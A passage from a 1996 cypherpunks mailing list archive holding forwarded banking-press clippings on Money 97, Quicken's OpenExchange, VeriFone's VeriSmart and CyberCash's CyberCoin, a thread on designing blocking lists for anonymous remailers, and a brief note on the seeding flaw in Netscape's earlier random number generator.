"That was true one year ago, and probably even six months ago," he added. "It
was now time for us to adjust our connectivity strategy and embrace the open
approach."

Intuit now hopes OpenExchange will be its gateway to the Internet. The company
plans to implement Internet connections for on-line investment activities next
spring and for on-line banking and bill payment next fall.

"Today," said Intuit chairman Scott Cook on the day the sale and

OpenExchange were announced, "rapid advances in safety and reliability of the
Internet make it the central focus of our overall connectivity and business
strategy."

OpenExchange is akin to other protocols being developed by Intuit competitors.
But unlike Microsoft Corp.'s Open Financial Connectivity and Visa
Interactive's ADMS (Access Device Message Specification), OpenExchange will
also transmit nonbanking financial information. Intuit hopes thereby to
encourage sales of its investment, tax, payroll and accounting software.


American Banker: Monday, September 30, 1996

Bad News for High-Tech Lending: Borrowers Prefer People

By Edward Kulkowsky

About 97% of all homeowners prefer to apply for mortgages in person, according
to a survey by the Mortgage Bankers Association.

The finding suggests that there might be tough sledding ahead for lenders
considering alternative marketing channels for mortgages, such as the
Internet, phone, and video conferencing.

The survey uncovered other consumer preferences that could be useful to
lenders.

"The findings are expected to help mortgage lenders more precisely target
current homeowners to refinance, as well as help them retain their own current
borrowers," said David Lereah, the MBA's chief economist.

"Further, the information contained in the study provides investment bankers
and institutional investors with an analysis of which types of mortgages are
likely to refinance, in order to better predict prepayment speeds on
mortgage-backed securities."

The MBA said the final report and a data tape of the complete study, "Mortgage
Refinancing Practices and Decision-Making Dynamics," is available for
purchase. The tape provides extensive demographic data that can be sorted and
stratified by 169 fields, according to the announcement.

All 1,500 respondents originated or refinanced a loan between January 1991 and
March 1996.

The survey found that borrowers had limited loyalty to their current lender.
About three-quarters of the 1,500 respondents to the survey were willing to
consider lenders in addition to their present provider.

About 80% of those who plan to remain in their homes more than five years said
they would refinance if rates fell by one to two percentage points. More than
half reported having refinanced their original mortgages, motivated primarily
by attractive rates and lower fees.

Other key findings:

* Some 80% of those who refinanced now have fixed-rate loans.

* About three-quarters of those who did not refinance already had fixed- rate
loans, and two-thirds have loans with rates of 6.6% to 8%.

* About a third of those who refinanced took out loans larger than their
outstanding balances.

* About half of the respondents said "too much paperwork" was the major
difficulty in the refinancing process.

The study was sponsored by the MBA, Citicorp Mortgage Inc., First Union
Mortgage Corp., First Chicago NBD Mortgage and Norwest Mortgage Inc. and was
conducted by R.S. Carmichael & Co., a market research company.


News Release (Microsoft): Monday, September 30, 1996

Survey Shows Americans Struggle with Financial Fitness

Experts look to PCs and Personal Finance Software for Better Money Management

Results from the recent Money '97 Financial Fitness Survey reveal the average
American's state of financial fitness falls well below expert guidelines.
Microsoft Money '97 personal finance software commissioned the telephone
survey of more than 1,000 respondents, in conjunction with the release of the
latest version of the software package, to gain a better idea of how Americans
are currently managing their personal finances. Some financial experts point
to the online revolution as a promising part of the solution to America's
woes. Studies show that over 750,000 households are already using online
banking, with projections for a staggering 13 million by the year 2000.

Computers and personal finance software are dramatically improving America's
potential to gain control of their money management. For so long, so many have
struggled to face the numbers, dreaded the monthly reconciliations and
wondered whether they were really saving enough. But help is here in a way
generations before never imagined. With a PC and personal finance software,
people can now sit in the comfort of home and use online banking to pay bills
electronically, reconcile check registers, transfer funds, and so much more.
This new technology opens up a whole new world of financial ease and control
for household money managers. Survey Reveals Persistent Trouble Spots

Conducted by Opinion Research Corporation of Princeton, NJ, the Microsoft
Money '97 Financial Fitness Survey compares American's personal finance
management practices with the advice of leading personal finance experts in
four key areas: 1) Budgets, Tracking & Categorizing; 2) Savings & Investments;
3) Credit Cards & Banking; 4) Retirement & Big Ticket Items. In all four
fitness categories, the survey shows that many Americans struggle with common
problem areas. For example:

On Budgeting

Experts say a solid, categorized budget is the foundation for financial
fitness, however:

* only 37% of Americans follow a categorized spending plan, while 42% simply
pay bills and allocate what's left. Another 17% say they just don't budget at
all.

On Saving

The advice "Pay yourself first!" is a familiar battle cry among financial
experts, however:

* more than half the Americans surveyed (56%) admit they do not set aside a
fixed amount or percentage from each paycheck.

Regarding those all-important personal emergency funds, experts say we should
have a minimum of two months living expenses on hand, however:

* among households with children between 12-17 years, a distressing 51% have
either no funds tucked away or only enough to cover 2-4 weeks in a crisis.

On Credit

Paying high interest on credit card debt can negate gains of other good
investments, however:

* among the 76% who have credit cards, more than half don't pay off their
balance each month, needlessly incurring finance charges and further debt.

Planning for the Future It's important to know early on what we'll need for
the big ticket items like college or our own retirement fund. However:

* on college tuition, among households with children under 12 yrs, a
surprisingly high 71% could not correctly estimate the cost of sending a child
to one year of state university 15 years from now ($22,000).

* on inflation, only 18% of Americans were able to correctly identify how much
today's dollar will be worth in 20 years (38 cents).

The Easy Way To Manage Money

"The Money '97 survey does signal some troubling financial fitness problems,"
says personal finance expert and best-selling author Neale S. Godfrey ("Money
Doesn't Grow On Trees," "A Penny Saved," "From Cradle to College"), "But it's
my job to tell people, 'it's okay,' and where to go from here." Godfrey and
other experts advise would-be money managers to start by getting the right
tools and getting organized. Says Godfrey, "I use Microsoft Money to help
people manage their money on a day-to-day basis and to see their complete
financial picture. Then, they continue using it to keep finances in shape."

Jack B. Root, President of Successful Money Management Seminars (SMMS) notes,
"By computerizing personal finances, the formerly unfit will soon be able to
determine exactly where their money's going. They'll have the understanding
needed to set long term goals, make strategic decisions and stay in control."
Microsoft Money '97 is an excellent task-based tool for tackling the most
common financial fitness problems. Money '97 is quick and simple to learn, and
helps the user work from categorized budgets, track finances, easily manage
accounts and pay bills electronically (no more checks!).

Even for the well-disciplined home finance manager, the online banking feature
of Microsoft Money '97 can be a real time-saver and expand options. The user
can easily download statements, balance accounts and transfer funds from home.
In the Money '97 Financial Fitness Survey, nearly a quarter (22%) of
respondents admit they reconcile their checking account to a bank statement
(when notified of insufficient funds) only occasionally or never. But even for
the many who reconcile regularly, studies show all but one percent are doing
it the tedious manual way. Online banking allows people to access statements
and reconcile checks at the touch of a button. Money '97 Launches National
Financial Fitness Campaign

To help America set out on the road to recovery, Money '97 is launching a
national Financial Fitness Campaign. The multi-tiered program kicks off with
free, open to the public Financial Fitness Events in New York, Chicago and San
Francisco.

Regional survey results and Money '97's campaign for change led the mayors of
all three cities to declare "Financial Fitness Day" on the date the event
comes to town. Participants will have a chance to take a financial fitness
test, have their most pressing fitness problems diagnosed, and meet with
financial experts for advice and information. The Money '97 training team will
also be out in full force helping event-goers learn how to computerize their
finances.

Download Trial Version of Money '97 Free at MoneyZone

Americans will have easy access to the tools needed to get started on their
own financial fitness program. Beginning September 30th you can download a
trial version of Money '97 for free (connect charges apply). Just go to
Microsoft MoneyZone on the World Wide Web at www.microsoft.com/moneyzone.
MoneyZone also links users to product support, a complete list of Money '97
ONLINE bank partners and a wealth of other personal finance management
information. Additionally, working with Money '97, Successful Money Management
Seminars (SMMS), will conduct ongoing seminars across the country to help
Americans improve their financial management skills.

Founded in 1975, Microsoft (Nasdaq: MSFT) is the worldwide leader in software
for personal computers. The company offers a wide range of products and
services for business and personal use, each designed with the mission of
making it easier and more enjoyable for people to take advantage of the full
power of personal computing everyday.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 2 Oct 1996 13:52:58 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <mZR5uD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


American Banker: Monday, September 30, 1996

Microsoft Ups the PC Banking Ante with Money 97

By JENNIFER KINGSON BLOOM

Launching a long-awaited assault on Intuit Inc. and its popular Quicken
system, Microsoft Corp. today releases a new version of its Money personal
financial management software, with new ways for banks to connect to it.

Microsoft executives say Money 97 is easier to use than its predecessor and
more widely available to banks.

Banks can offer Money 97 services in various ways: through processors like
Checkfree Corp., Intuit Services Corp., and Visa Interactive; or directly
through Microsoft's "open financial connectivity" standard for on-line
commerce.

Microsoft also announced that 37 banks are offering Money 97 -- roughly the
same number that today offer Quicken services -- and that at least 23 more
will offer Money 97 by yearend. "We're here today with a lot of what Quicken
is announcing they'll have a year from now," said Richard Bray, Money 97
product unit manager at Microsoft.

"What this really means is more banks will be available through Money sooner
than through Quicken." But Intuit officials said they did not feel threatened.

"What they mostly did was add a few features we already had," said Matthew
Glickman, Quicken group product manager.

Bankers planning to offer Money 97 said Microsoft's open technology standard
was a major benefit.

"We will be able to provide our customers with the same service that they're
used to, which is on-line, real-time balances," said Michael Papantoniou, a
vice president in electronic commerce at Chase Manhattan Bank.

"Microsoft Money and Quicken now have to go through Intuit Services Corp. -
that's the big difference," he said. "ISC only has start-of-day balances."

Bankers also praised Money 97 for giving prominence to bank brand names.
Customers will see their banks' logo, Internet address, and whatever other
information the bank chooses to provide.

Henry Mounger, senior vice president of consumer product development at
Deposit Guaranty National Bank in Jackson, Miss., said his own "road test" of
Money 97 convinced him the bank should offer it. Deposit Guaranty had not
previously offered Money or Quicken.

"The overriding impression I had was its ease of use," Mr. Mounger said of
Money 97. "I had never used Quicken or any other personal financial management
software before, and I was banging out reports right and left."

Mr. Mounger said the ability to offer Money 97 through Visa Interactive was
also an attractive feature.

"We're trying to maximize that vendor relationship," he said. "We obviously
recognize the fact that Quicken is a very visible product in the marketplace,
but we're not prepared at this point to go through all those operational
issues to get up and connect."

This month, Intuit announced the sale of its processing division to Checkfree.
It also announced an alternative to Microsoft's technology specification that
it dubbed OpenExchange. Mr. Bray of Microsoft said Intuit's standard is a late
entry in the race.

"They didn't announce anything new with OpenExchange -- what they were trying
to do was slow down the market because they're a year behind," Mr. Bray said.

"There's no reason for banks to wait another year, and the big banks aren't
waiting," he said. "Why should they wait for an undocumented, unpublished
format when there's one available today that they can work with?"

Mr. Glickman at Intuit said his company's open standard does the same things
as Microsoft's, "but in a much better way," offering a choice of processors
plus "a broader range of connectivity."

Mr. Papantoniou at Chase said he also viewed OpenExchange as a broader
standard, but hoped the two specifications would converge. "That would benefit
all banks," he said.

Chase, like many of the larger banks, offers both Quicken and Money options
for home banking.

Some bankers who offer both products said they were pleased with the
improvements to Money but are not taking sides in the Microsoft-Intuit
rivalry.

"The more they talk about each other, the more focus there will be on personal
financial software, and the better for me," said S. Michael Woodward, a vice
president in strategic marketing at Crestar Bank in Richmond, Va.

"We don't come out and promote Quicken over Money or BankNow" -- Intuit's
transaction-oriented offering with America Online. "I think both of them have
done a very good job." Despite some bankers' neutrality, Money 97 is
guaranteed to step up the competition for customer loyalty.

"This is going to be a really interesting season for the personal finance
software market," predicted Phoebe Simpson, an electronic commerce analyst at
Jupiter Communications in New York.

"The fact that you can download the Quicken data into Money 97 is going to be
very interesting, and will ease the entrance of anyone who is looking to
switch."

Mr. Bray said Microsoft wanted to make switching from Quicken to Money "as
easy as possible." Quicken users are being offered a $10 discount on the
$34.95 retail price of Money 97, as well as the ability to instantly transfer
all their existing Quicken files into Money 97.

Microsoft also plans to offer all comers free 90-day trials of Money 97.

Another new feature of Money 97, critical to banks and consumers, is Internet
connectivity. Users will be able to connect not only to their banks but to a
Web site Microsoft maintains that offers current stock quotations.

Mr. Glickman of Intuit said Microsoft's previous efforts to make Money widely
available had failed to dent Quicken's market share, and he predicted the same
would hold for Money 97. "We've added over a million customers in the last
year," Mr. Glickman said.

Citing numbers compiled by PC Data of Reston, Va., Mr. Glickman said Quicken
has 73% of personal financial software users, Money 23%; 4% use other types.

"Microsoft has increased its market share, but it has come at the expense of
the smaller players like (Meca Software's) Managing Your Money," Mr. Glickman
said.

Ms. Simpson of Jupiter Communications said the release of Money 97 reflected
Microsoft's belief that high-function software could double as a mass market
product.

"Intuit sees the market splitting into transactors and trackers, and Microsoft
does not buy into that, so they have worked with their product to get sort of
a blend of the two," she said. "I think it's going to be a tight race."



American Banker: Monday, September 30, 1996

Verifone Woos Banks with Personal ATM

By JEFFREY KUTLER

Verifone Inc. is claiming a breakthrough toward one of electronic banking's
holy grails: an automated teller machine in the home -- or, for that matter,
in the pocket.

The Redwood City, Calif., company is introducing Personal ATM, a palm-size
device with a smart card slot. Among other interactive capabilities, it allows
value to be loaded onto the card via telephone.

Accompanying Personal ATM, to be unveiled today at the American Bankers
Association's bank card conference in Orlando, is Verismart, a system Verifone
says will make smart cards more appealing to the banking, retailing,
telecommunications, transportation, and utility industries. While Verifone is
not the first to see the remote banking potential of plastic cards with
built-in computer chips - for example, the Dutch company Philips makes screen
telephones with smart card readers - Personal ATM may be more ready for the
mass market.

As purely a card reader -- lacking processing power, computer intelligence, or
memory, but connectable through a phone jack -- Personal ATM is so cheap that
banks ought to consider almost giving it away, said C. Lloyd Mahaffey,
Verifone's vice president of global marketing.

He would not discuss prices but said they are a stark contrast to the $100 or
$200 that screen phone manufacturers are hoping will attract widespread
acceptance, or the bare-bones $500 network computers that Oracle Corp. and
others contend are the key to mainstream Internet use.

"The consumer might pay $2 or $3 a month, not the $90 or $100 it takes to buy
some devices that we see at technology trade shows," Mr. Mahaffey said in an
interview last week. He predicted "volume deployments" of Personal ATM by
mid-1997.

He said the battery-powered device might be mailed out in a sturdy, compact
box -- under the brand name of a bank or other provider -- along with two
smart cards.

The economics are such that if a defective machine arrives, and the customer
calls to complain, the service representative will say, "Throw it away. We'll
send a new one," said Mr. Mahaffey, architect of the Verifone consumer
strategy typified by Personal ATM.

In current parlance, Personal ATM is the ultimate "thin client." That means it
is "intellectually challenged," Mr. Mahaffey said, relying on the smart card
and on-line connections for what it needs to know.

But Mr. Mahaffey said that is the key to the cost advantage through which
Verifone hopes to dominate consumer automation as much as it does the point of
sale terminal market, where its share is near 70%.

The Verismart system is designed to embed the smart card capability in devices
other than Personal ATM -- computer keyboards, telephones, television set-top
boxes. Verifone has already forged alliances with manufacturers in such
fields, including Keytronic, GTE, and Scientific Atlanta, as well as Mondex
International and smart card maker Gemplus.

At least 10 companies have signed to support Verismart, including American
Express, MasterCard, Visa, and Wells Fargo Bank.

Verifone says it is addressing some bankers' reluctance to commit to Mondex,
Visa Cash, or a competing scheme: Verismart is "device independent," meaning a
bank is not forever locked in to any smart card decision.



News Release (VeriFone): Monday, September 30, 1996

VeriFone to Develop Smart Card Applications and Services

VeriFone, Inc. (NYSE:VFI), the leading global provider of secure payment
solutions, today announced plans to develop the VeriSmart System -- the first
end-to-end system for creating smart card applications and services. VeriSmart
pilot programs are planned with leading companies throughout the world,
including American Express, GTE, MasterCard, Mondex International, Ltd.,
NIPSCO Industries, Inc., Sparbanken Bank (BABS), Sears Payment Systems (SPS),
and Wells Fargo.

The VeriSmart System will provide the applications, integration services and
marketing support required to enable these companies to offer expanded smart
card products and other services to their customers.

The VeriSmart System was announced concurrently today at the ABA Bank Card
Conference with a separate announcement from VeriFone and other leading
companies for plans to develop personal devices and information appliances
that will bring low-cost smart card capability directly to consumers.

VeriSmart, a flexible, open, smart card system, is the first solution that
will enable multiple consumer appliances, such as a personal/home ATM device,
smart phone, personal computer or set-top-box, to access a variety of smart
card applications, and seamlessly integrate with back end payment and
transaction systems worldwide.

VeriSmart, which will reside on various companies' host systems, is being
designed to allow a customer to access and interact with their accounts to
retrieve electronic cash, monitor services, pay bills, receive healthcare
information, get updates on frequent flyer awards and other personal services.

"VeriFone's Consumer Systems Division is developing the first realistic
solution that is expected to stimulate the emerging smart card market,
bringing consumers and providers together through robust, interactive products
and services for everyday banking, health insurance, and utility
transactions," said C. Lloyd Mahaffey, vice president of global marketing for
VeriFone. "The wide range of industries that are looking to implement
VeriSmart products and services indicates the enormous potential for smart
card services we can expect in the future."

The flexible design of the VeriSmart server and applications software,
installed on the provider's host computer, will readily support additional
applications and upgrades as they are developed. VeriSmart applications can
allow these providers to offer new and unique products to broaden their
customer base through value added smart card services.

"The real value of smart card technology will not be realized until consumers
have a compelling reason to change the way they conduct business today," said
Thomas Kilcoyne, general manager, VeriFone's Consumer Systems Division. "The
security, convenience and access to personal information they'll have through
their telephone, home ATM, PC or television can dramatically enhance their
relationships with providers who offer these services." Eight Major Companies
Prepare Solutions

VeriFone's Consumer Systems Division will begin working with leading providers
to develop and deploy enhanced consumer smart card-based products and
services.

"We are enthusiastic about exploring business solutions that incorporate the
VeriSmart System," said David L. Boyles, senior vice president of New Business
Ventures for American Express' Stored Value Group. "These types of products
have tremendous applicability to some of the products we will be launching in
the future. VeriSmart's open system architecture is exactly the kind of
technology that American Express is committed to applying to its global
infrastructure, so that we may ensure maximum customer satisfaction and
worldwide usability."

Sparbanken Bank (BABS), is Sweden's largest savings bank. "The VeriSmart
System will allow us to offer our customers a wide range of stored value card
applications. We look forward to working with VeriFone on this exciting new
program," said Jan Olof Brunila, vice president, Development, for Sparbanken.

"GTE is the largest publicly held telecommunications company in the world with
revenues of 20 billion dollars in 1995. It is also the largest U.S. based
local telephone company with wire line and wireless operations covering about
one third of these countries population. "GTE is interested in further
exploring this exciting new technology," said Jim Palma, senior manager, New
Product Markets.

"MasterCard is eager to test this product and offer an early pilot to our
members when it is ready," said Steve Mott, senior vice president, Electronic
Commerce/New Ventures for MasterCard International. "We believe VeriSmart
targets important emerging needs in the electronic commerce market."

Mondex International Ltd., the leading chip-card based electronic cash payment
system being introduced by institutions around the world, offers consumers a
secure and convenient alternative to cash. "This announcement marks another
important step forward for Mondex as a global electronic cash system. We are
working with VeriFone and others to deliver e-commerce applications that will
bring real benefits of convenience and security to consumers worldwide", said
Mike Young, head of New Product Development, Mondex International Ltd. "We
look forward to VeriSmart providing yet another secure path for offering
Mondex transactions over the Internet."

NIPSCO Industries, Inc., an energy-based holding company located in northern
Indiana, intends to initially offer the VeriSmart system to the broad base of
customers of its electric and natural gas utilities. "Through our strong
customer relationships, we can help the VeriFone alliance build a two-way
gateway to the home," said Barbara D. Haas, group vice president of Marketing
and Communications. "We plan to concentrate our efforts on developing ways to
use this two-way technology to read meters, automatically report electrical
outages and supply energy usage information to the customer."

SPS Payment Systems, Inc., is a provider of technology-based outsourcing
services. Principal businesses include: point of sale credit card transaction
processing; administration of consumer private label credit card programs; and
customized operating services such as help desk support and customer service.
"SPS Payment Systems has worked with VeriFone and utilized their hardware to
meet the retail point-of-sale needs of many of the clients for whom we process
credit and debit transactions. Their new VeriSmart System will represent an
opportunity for us to provide electronic payment processing through a variety
of consumer appliances such as personal/home ATM devices, smart phones or
PCs," said Patrick A. Albright, director of Industry Marketing, for SPS
Payment Systems.

Wells Fargo, a leading force behind the development of Mondex in the United
States, supports VeriFone's new technology. "The VeriSmart System is
ground-breaking technology that will significantly reduce the cost and
complexity of offering multiple applications to our Mondex customers," said
Janet Hartung-Crane, senior vice president of Wells Fargo's Electronic
Payments Division. Wells Fargo & Co., the 9th largest bank holding company in
the United States, has assets of $108.6 billion following completion of its
merger with First Interstate.


News Release (CyberCash): Monday, September 30, 1996

CyberCash Launches CyberCoin Service

Individuals can finally make small purchases on the Internet securely and
instantaneously with CyberCash's revolutionary new electronic coin service.
CyberCash, Inc. (Nasdaq: CYCH), today announced CyberCoin(TM), an innovative
payment service that enables cash transactions, typically from $0.25 to
$10.00, and can be used with funds drawn from a consumer's existing bank
account.

"CyberCoin fulfills a growing need for consumers to purchase lower-priced and
'impulse' items on the Internet -- especially digital goods and services that
can be instantaneously downloaded to your computer, such as software,
articles, research, games and music," said Bill Melton, CEO of CyberCash.
"Internet merchants must offer consumers the ability to make spontaneous,
small denomination payments on the Internet to take electronic commerce to the
next level."

CyberCoin Provides Merchants with New Opportunities

"Shopping on the Internet for low-priced items will be as easy as pulling a
coin out of your pocket at the store, newsstand, or video arcade," said Ray
Speichert, CEO of Headgames, a Web merchant who will offer the online game
Worbble, using the CyberCoin service. "With CyberCoin, players from around the
world can compete against other players on the Internet on a pay-per-play
basis."

Until now, merchants have been unable to effectively sell low-priced,
value-added products and services over the Web. CyberCoin removes this
barrier, and opens up a new world of digital commerce opportunities. A broad
range of soft goods and services can now be sold and delivered electronically,
allowing merchants to drive incremental sales of items such as newsletters,
graphic art, real-time stock quotes and virtual games.

"As the premier provider of high quality financial information, Quote.COM's
mission is to fulfill the sophisticated needs of serious investors," said
Quote.COM President Chris Cooper. "CyberCoin will add a powerful pay-per view
option for on demand purchase of financial information, giving our subscribers
even greater flexibility to manage their portfolios."

CyberCoin Opens Up the Internet for the Consumer

Free, easy-to-use and secure, CyberCoin provides consumers with a
revolutionary new way to shop online. CyberCoin can be used with any existing
bank account or major credit card -- all that is needed is an Internet Wallet,
which is free to consumers and can be downloaded from the CyberCash Web site
at (http://www.cybercash.com).

"There is undoubtedly a niche for coin payment on the Internet and CyberCash
is ahead of the pack in developing a user-friendly option for small cash
purchases online," said Parker Foley, Vice President and Director of
Electronic Commerce, First Union National Bank. "We are pleased to be among
the first to pilot this new service in 1996 and hope to offer its convenience
to our Internet customers by early next year."

Easy to download and install, the Internet Wallet is a password protected
software program that enables encrypted transactions to move between the
consumer, the merchant, and their banks. Just like an everyday wallet, the
Internet Wallet offers several types of payment options and can be used with
any major credit card in addition to the new CyberCoin payment service.

Online Shopping Made Easy With CyberCoin

CyberCoin provides the consumer with the ease and simplicity that has been
missing from the Internet shopping experience. When an individual on the Web
finds an item that he or she would like to purchase, the consumer simply
clicks on the Coin icon next to the goods. It's that simple. The entire
process takes only seconds. A complete transaction log of all purchases is
kept in the Wallet.

The consumer can easily, and at no cost, move money in and out of the Wallet
to use the CyberCoin service. The user chooses the amount of money he or she
wishes to move (in multiples of $20, up to $80), and selects whether to use
funds from a bank account or credit card. Security is ensured since the money
never leaves the bank-if the consumer's PC crashes, no funds are lost. Funds
in the CyberCash system are FDIC-insured, giving an added measure of security.
CyberCash Partners with Banks to Deliver CyberCoin Service

CyberCash will work with banks to integrate the CyberCoin technology and
services into the banks' Internet offerings for both their merchants and
consumers. Participating banks will offer the CyberCoin service to online
merchants and provide them with critical back-end processing capabilities and
access to existing financial networks. Merchants will pay the banks a
per-transaction fee, similar to a credit card transaction, to use the
CyberCoin service. CyberCash receives a fee for each transaction from the
banks.

Pricing and Availability

CyberCash's CyberCoin service is available now for banks, merchants and
consumers. First Union, First USA Paymentech, First Data Corporation and its
affiliated banks, and Michigan National Bank have already committed to offer
or pilot the CyberCoin service to merchants and/or to consumers before

the end of the year. Merchant server software is available immediately from
CyberCash on the Windows NT, Solaris and BSDI platforms, with other platform
versions available by the year-end. Consumer Internet Wallets can be
downloaded for free from the CyberCash Web site at www.cybercash.com.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 2 Oct 1996 10:23:07 +0800
To: cypherpunks@toad.com
Subject: Re: Making Remailers Widespread [REMAILERS]
In-Reply-To: <199609300728.AAA17384@netcomsv.netcom.com>
Message-ID: <a2R5uD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:

> At 09:37 AM 9/29/96 EDT, you wrote:
> >How about: maintain a list of trusted blocking-list sites (comparable to the
> >list of remailers used for chaining) and when it comes the time to update th
> >local copy of the blocking list, ask a random one on the list; if it's down,
> >ask another random one on the list. There may even be more than one list. :-
> 
> Getting more complex, but it might be workable.

Unfortunately, making a system more reliable and available sometimes
entails additional cost in terms of complexity and redundancy.

> >> sender-blocking list 
> ...
> >With most ISP's it's trivial to forge one's From: header in SMTP.
> >Switching to another dime-a-dozen throwaway account is also trivial.
> >Just admit that you can't block senders, and don't pretend that you
> >can - false pretenses destroy one's credibility.
> 
> You obviously can't source-block a determined spammer, but you can
> slow down some spam attacks, especially if they're one individual 
> using his/her regular account.  It's no panacaea, but it helps.
> Also, if you source-block based on patterns anywhere in the header,
> you can catch less capable email forgers.

If you don't see why I think it's wrong to pretend to be able to do
something you can't do, then I probably can't explain it to you.

Try asking your parents or your priest or something. :-)

> >I think I see a way to accomplish this without too much trouble.
> >When an e-mail is directed at u@c4.c3.c2...c1, the code that checks
> >for blocking will search for the following records in the blocking list:
> >u@c4.c3.c2...c1     (exact match)
> >*@c4.c3.c2...c1     (replace user by *)
> >u@*.c3.c2...c1      (replace leftmost .-separated piece of domain by *)
> >*@*.c3.c2...c1      (both)
> >and repeat until there are only 2 components left in the domain name.
> 
> That'd work.  It's clunky, but there's no avoiding clunkiness
> for this sort of thing, and it does preserve privacy.

I think it'll be pretty efficient, though.

> 
> >Now, the question is, who would be allowed to add records containing
> >'*' to the blocking list using the cookie protocol? I suggest that it be
> >one of the contacts listed in Internic's database.
> 
> postmaster@domain is (ostensibly) guaranteed to exist.
> The Internic database is an interesting alternative, but for this
> I suspect postmaster is good enough.  There's also the problem
> that for many domains, where smallcompany.com is virtual on an ISP,
> the Internic database will generally list someone at the ISP,
> who probably has no interest in the issue, rather than someone
> responsible for making decisions about smallcompany.com

That's a very good point: I retract the InterNIC siggestion.

Also it's possible for someone to be reached at a certain address, but not
be able to e-mail from that address. So here's the new improved version:

Scenario 1. Alice used to be a student at nursery.edu, reachable as
alice@nursery.edu. She can no longer log in there, but her e-mail is
forwarded to alice@work.com. Alice doesn't wish to receive anonymous
e-mail via her edu account unless it includes a reply block.

Alice tells one of the 'bots maintaining the blocking lists that she
wants alice@nursery.edu blocked. She should be able to make this
request via a WWW form or by e-mailing a 'bot from alice@work.com.

The 'bot sends a cookie to alice@nursery.edu, which is forwarded to
alice@work.com. Alice sends back the cookie to confirm.

(To prevent an obvious attack, the 'bot shouldn't send more than one
cookie to a given address in a 24-hour period. Perhaps one of the
flags should be 'don't send cookies unless the request is e-mailed
from the account.)

Scenario 2: root@bwalk.dm.com wants to add *@bwalk.dm.com to the
blocking list. (Not likely. :-). Again, the request is submitted
to one of the 'bots via a WWW form or by e-mail. Seeing that the
address contains a wildcard, the 'bot sends a cookie to
postmaster@bwalk.dm.com. Presumably whoever reads postmaster
mailbox is authorized to send back the cookie and to confirm
the wildcard block.

> >Thus a blocking record for cypherpunks@toad.com could be added by
> >anyone listed in toad.com's Internic entry.  There's no need for any
> >Remailer Cabal [tinc] to maintain blocking lists.
> 
> For destination blocking, I agree that users should be able to 
> block their own stuff as automagically as possible.

I think it's fair to assume that whoever demonstrates his ability to
receive postmaster's mail by returning a cookie sent to postmaster has
the authority to block receivers in that domain.

I.e. there needs to be a way for postmaster@toad.com to say:
block cypherpunks@toad.com, but send the cookie to postmaster@toad.com,
not cypherpunks@toad.com.

I think it's fair to assume that whoever gets a cookie sent to an
address has the authority to block that address: that takes care of
the .forward scenario I described.
> For source blocking, most of the need is for spams and abusers
> that have been tracked down (or identify themselves in their postings),
> and that takes human thought.  In particular, spammers are unlikely
> to block themselves from the remailers (:-), but forgers may try to block
> legitimate users.
> 
> >One other suggestion: instead of storing one bit of information (the
> >address is on the list or not), why not have several flag bits.
> >E.g., the blocking list could contain records similar to:
> >hash - e.g. 160-bit SHA
> >flags - e.g. reserve 32 bits
> 
> Interesting.  I suspect the state of the art would be to collect
> the bits with a disclaimer that there isn't any code to interpret them :-),
> but it does let you build a blocking database that's usable as capabilities
> grow.
> Any suggestions for flags besides block/allow one-way, block/allow two-way,
> and max-size?  I'm thinking of doing a remailer that instead of sending
> you a message, it sends you a retrieval cookie and lets you send it back
> to collect the message; blocking that would be another flag.

I just came up with another one above. :-) I think reserving 32 bits should
be enough for future expansion, or 64 to be really generous with disk space.

> 
> The other kind of blocking that needs adding is blocking by
> words in message bodies - the spammer that caused me to shut down
> my remailer and not bring it back up was posting hate messages
> with somebody else's name and email signed at the bottom.  
> It only took one or two to generate a flood of flames to the victim,
> and my current remailer couldn't block any followups.
> Also, since the spammer wasn't generating the flames himself,
> his spam slipped under the remailer's spam counter, just as
> hipcrime's did.  This sort of blocking also lets you block
> things like the hipcrime spam and MAKE MONEY FAST.
> But it's a much more sensitive problem - anybody who can add things
> to the body-checking list can start doing real censorship,
> and it's probably best to leave that to individual operators to block,
> or at least to turn on by hand rather than default.
> 


I agree that each operator should be able to block what goes out of
his remailer based on strings being contained in the body. However
having some Cabal force this filtering automatically on all remailer
operators is a very bad idea, even if the operators consent to it.
In the scenario you described above, was the victim's address encrypted
in the reply block, or was it in cleartext? If it was in cleartext, then
it's little different from Peter Vorobiev forging garbage in my name
and Timmy May (fart) quoting it as someting I really said.

(Some time ago Vorobiev forged Usenet articles from my wife's seldom used
account on another machine claiming that we split up. Dave Hayes actually
asked me over the phone if it's true. There are strange people out there.)


I'm not claiming to have all the solutions - this is merely a way to
block recepients without taking up too much of operator's time.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philip L. Karlton" <karlton@netscape.com>
Date: Wed, 2 Oct 1996 09:34:24 +0800
To: paul@fatmans.demon.co.uk
Subject: Re: Mousepad RNG's?
In-Reply-To: <844013772.1731.0@fatmans.demon.co.uk>
Message-ID: <325182C3.7184@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk wrote:
 
> I don`t know what PRNG netscape used in the broken
> version, can anyone tell me what they used, and whether it was the
> PRNG or the seed that was weak

The problem was with the seed; it was especially vulnerable to attacks
from somebody running on the same machine. Sufficient entropy is now
obtained during initialization and the PRNG is reseeded reasonably often
during execution. For the Navigator, this is every time the user event
loop cycles.

> also I would be interested to know
> what they are using now in terms of the algorithm and seed...

A pointer to the fixed code was posted to cypherpunks last year.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation

    Everything should be made as simple as possible, but not simpler.
	-- Albert Einstein




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
